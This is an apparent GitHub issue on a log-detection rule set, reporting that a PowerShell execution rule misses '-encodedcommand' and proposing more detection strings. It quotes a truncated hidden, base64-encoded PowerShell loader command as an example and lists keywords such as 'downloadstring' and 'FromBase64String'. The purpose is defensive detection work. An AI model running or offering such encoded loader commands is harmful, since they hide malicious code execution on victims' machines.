"Powershell_Execution" rule does not catch "-encodedcommand"
congtrung2k1 opened this issue · 2 comments
In the Powershell_Execution rule of ./app/utils/Dracarys/Rhaegal/rules/malicious/rules.gh, it is only condition to catch text in Data like below:
Event.EventData.Data.#text:
- "downloadstring"
- "downloadfile"
- "iex"
- "* -e *"
And there is another way to encode the command: -encodedcommand
Suggestion: Add string:
- "* -encodedcommand *"
More strings should be added:
- "FromBase64String"
- "* -File "
- " -ExecutionPolicy ByPass *"
Here is an example payload:
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADQAZwBFAEsASQBU
the embedded Rhaegal is not enough to be honest, there is a lot of options not included, but it is a sample that help to create more custom rules